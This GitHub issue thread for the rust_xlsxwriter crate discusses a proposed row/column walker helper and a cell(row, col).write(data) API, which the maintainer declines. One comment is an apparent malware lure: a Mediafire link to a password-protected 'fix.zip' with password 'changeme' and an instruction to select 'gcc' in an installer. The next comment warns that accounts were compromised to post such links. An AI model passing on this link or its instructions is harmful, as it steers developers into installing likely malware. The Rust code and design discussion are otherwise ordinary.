### ISSUE TITLE
feature request: row/column walkers (would you accept a PR?)

### ISSUE THREAD

**Issue by Expurple** [jmcnamara/rust_xlsxwriter#109]
### Feature Request

I have some hepler types to abstract away iteration over row/column numbers:

```rust
let mut walker = RowWalker::new(&mut worksheet, 2);
walker.at_next_row(|mut w| {
    assert_eq!(w.row(), 2);
    w.write("A3")?;
    w.write("B3")
})?;
walker.at_next_row(|mut w| {
    assert_eq!(w.row(), 3);
    w.write("A4")?;
    w.write("B4")
})?;
assert_eq!(walker.next_row(), 4);
```

This isn't the entire API, but you get the point.

I'd like to publish and easily reuse them. But a separate library crate would require a lot of maintainance, since `rust_xlsxwriter` is (currently) semver-unstable. I'd have to define a range of versions, test against these multiple versions and frequently evaluate and bump the upper bound as new versions are released. (Basically, I'm reiterating my semver complaints from [here](https://github.com/jmcnamara/rust_xlsxwriter/issues/1#issuecomment-1921171697))

Do you mind absorbing these heplers into `rust_xlsxwriter` itself? This shouldn't require much maintenance on your part, because the core `write`/`write_with_format` APIs don't break that often. And this would probably help with discoverability.

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
# **DO NOT DOWNLOAD ANYTHING I HAVE POSTED AS A COMMENT MY ACCOUNT WAS COMPROMISED AND BEING USED TO COMPROMISE OTHERS**

**I AM WORKING ON DELETING AND POSTING THIS ON ALL THREADS IN WHICH THEY USED MY ACCOUNT TO POST THIS**

**Comment by Expurple** [comment]
Ok, I gave this some thought, and actually I don't have a practical need for a range of versions. I'm always using the latest in my project. So the rant about semver turns out to be theoretical/esthetical. Just regularily bumping to the latest isn't "a lot of maintainance".

**Comment by Expurple** [comment]
I've just remembered another unrelated issue that I **actually** face with my wrappers. Manually wrapping `Worksheet`'s per-cell methods is really annoying! My `CellWalker<'_>` (the inner `w` in the original example) has all these methods just to wrap the core `write`/`write_with_format` API:

```rust
pub fn write<T>(&mut self, data: T) -> Result<(), XlsxError>
pub fn write_with_format<T>(&mut self, data: T, format: &Format) -> Result<(), XlsxError>

// Escape hatches for random access
pub fn write_at<T>(&mut self, column: ColNum, data: T) -> Result<(), XlsxError>
pub fn write_with_format_at<T>(&mut self, column: ColNum, data: T, format: &Format) -> Result<(), XlsxError>

where
  T: IntoExcelData
```

And it would need even more methods to cover other APIs which I haven't used yet. But all it's doing is essentially just a "partial application" of row and column numbers to a `Worksheet`!

What do you think about changing (or duplicating) your API from
```rust
worksheet.write(row, col, data)?;
```
to something like this?
```rust
worksheet.cell(row, col).write(data)?;
```

It's a bit more verbose, but this would allow me to have just two `&mut` methods on my `CellWalker<'_>` and cover the entire upstream API in a future-proof way:

```rust
pub fn at_next_col(&mut self) -> MutCell<'_>

// Escape hatch for random access
pub fn at_col(&mut self, column: ColNum) -> MutCell<'_>
```

where `MutCell<'_>` is basically just this partially-applied `(&mut Worksheet, RowNum, ColNum)`.

I think, this would also make the `Worksheet` API more modular and easier to navigate. You'd have per-worksheet operations and range/cell accessors on `Worksheet`, then per-range operations on `RangeMut<'_>` and per-cell operations on `CellMut<'_>`. I've definitely had troubles with `Worksheet` API feeling large and hard to navigate.

**Comment by Expurple** [comment]
And coming back to the topic of upsteaming my wrappers. Currently, they take just 110 LOC (with insufficient docs, testing and `Worksheet` API coverage, ofc). With the proposed `MutCell<'_>` API, they should become *really* slim, easy to maintain, and worth simply upstreaming IMO.

**Comment by jmcnamara** [comment]
> to something like this?
> 
> ```rust
> worksheet.cell(row, col).write(data)?;
> ```

That is a nice interface. It is actually similar to the way the Python [OpenPyXL](https://openpyxl.readthedocs.io/en/stable/) library (not my Python library) handles things.

However, I think that it too late to retrofit that into `rust_xlsxwriter`. As such I am going to close this request. Please let me know when your crate is upstream.
